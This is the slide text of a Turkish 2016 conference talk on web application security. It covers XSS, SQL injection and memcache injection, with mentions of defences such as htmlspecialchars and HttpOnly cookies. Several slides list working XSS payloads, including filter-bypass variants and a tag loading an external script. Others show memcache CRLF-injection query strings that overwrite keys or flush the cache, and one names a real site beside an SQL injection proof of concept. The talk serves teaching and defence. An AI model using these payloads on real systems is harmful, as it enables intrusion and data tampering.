Akademik Bilişim 2016 etkinliği kapsamında Aydın Adnan Menderes Üniversitesi'nde vermiş olduğum seminerin sunumu.

1. Web Uygulama Güvenliği
Akademik Bilişim 2016
Ömer Çıtak

2. #! whoami
Full-Stack Developer @ Cydets Inc.
development && security
www.omercitak.com
Social : @Om3rCitak

3. #! cat index
• Cross-site Scripting (XSS)
• SQL Injection
• Memcache Injection
• Upload Authentication

4. #! ping-pong.jpg

5. #! dont-trust-anyone.jpg

6. #! cross-site-scripting
• Reflected XSS
• DOM Based XSS
• Stored XSS

7. #! reflected-xss.jpg

8. #! reflected-xss-poc.jpg

9. #! dom-based-xss.jpg

10. #! stored-xss.jpg

11. #! stored-xss-poc.jpg

12. #! stored-xss-poc.jpg

13. #! cat classic-xss-payloads
• <script>alert(1)</script>
• <img src="javascript:alert('XSS');">
• <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
• <SCRIPT a=">" SRC="http://omercitak.com/xss.js"></SCRIPT>
• <video src=1 onerror=alert(1)>
• <audio src=1 onerror=alert(1)>
• <img src=x onerror=alert(1)">

14. #! cat xss-bypass-payloads
• <scrscriptipt>alalertert(1)</scrscriptipt>
• alert(String.fromCharCode(88,83,83))
• <IMG SRC=&#106;&#97…………….&#39;&#41;>
• <IMG SRC='vbscript:msgbox("XSS")'>

15. #! xss-protection-1.jpg
• Strip Tags
– http://php.net/manual/tr/function.strip-tags.php

16. #! xss-protection-2.jpg
• HTML Special Chars
– http://php.net/manual/tr/function.htmlspecialchars.php

17. #! xss-protection-3.jpg
• HttpOnly Cookies (session_set_cookie_params)

18. #! xss-protection-4.jpg

19. #! xss-protection-4.jpg

20. #! xss-demo.jpg

21. #! sql-injection
• Union Based SQL Injection
• Blind SQL Injection
• Time Based SQL Injection

22. #! union-based-sql-injection.jpg

23. #! sql-injection-login-bypass.jpg

24. #! cat blind-sql-injection
• Ya hatalar gizlenmiş ise? (error_reporting(0))
• Ya mysql_* fonksiyonlarının başına «@» konulmuş ise?

25. #! blind-sql-injection.jpg
Reis Yaradan
öbür tarafta
sormayacak mı reis
neden Blind Injection
denemedin diye?

26. #! blind-sql-injection.jpg

27. #! blind-sql-injection-poc.jpg

28. #! blind-sql-injection-poc.jpg

29. #! cat time-based-sql-injection
• Ya arka planda çıktı vermeyen bir query çalışıyor ise?
– Count Query
– Update Query
– Insert Query
– Delete Query
– Relationship Query

30. #! time-based-sql-injection.jpg

31. #! time-based-sql-injection.jpg
MySQL Server
Microsoft SQL Server
Oracle Server

32. #! sql-injection-poc.jpg
Uluslararası Af Örgütü (amnesty.org.tr)

33. #! sql-injection-poc.jpg

34. #! sql-injection-demo.jpg

35. #! memcache-injection

36. #! using-memcache.jpg

37. #! phpstorm memcached.php

38. #! telnet 127.0.0.1 11211
> set key 0 10 5
> value
< STORED
> get key
< VALUE key 0 5
< value
< END

39. #! phpstorm memcached.php

40. #! phpstorm memcached.php

41. #! phpstorm memcached.php

42. #! phpstorm memcached.php

43. #! phpstorm memcached.php
?key=omer 0 10 6 rn hacked rn
• urlencode(‘r’) = %0d
• urlencode(‘n’) = %0a
?key=omer 0 10 6 %0d%0a hacked %0d%0a

44. #! phpstorm memcached.php
> set omer 0 3600 6
> hacked
< STORED
> 123456
< ERROR

45. #! phpstorm memcached.php
?key=aaaaa…(251)
set yenikey 0 3600 6 %0d%0a hacked %0d%0a
?key=a %00
set yenikey 0 3600 6 %0d%0a hacked %0d%0a
?key=aaaaa…(251)
flush_all %0d%0a

46. #! cat vulnerable-libraries
Python : Python-pylibmc
Php : Memcached
Asp.Net : memcacheddotnetproject (1.1.5)
Java : com.meetup.memcached

47. #! cat safe_libraries
Python : python-memcache
Php : memcache
Java : java.net.spy.memcached

48. #! cat using-memcached-library
Wordpress
Joomla 3.2.2
Piwik 2.1.0
MODX Revolution 2.3

49. #! ascii-table.jpg

50. #! phpstorm memcached.php

51. #! upload-authentication

52. #! upload-authentication-poc

53. #! wget questions

54. #! exit
Thanks <3
www.omercitak.com
Social : @Om3rCitak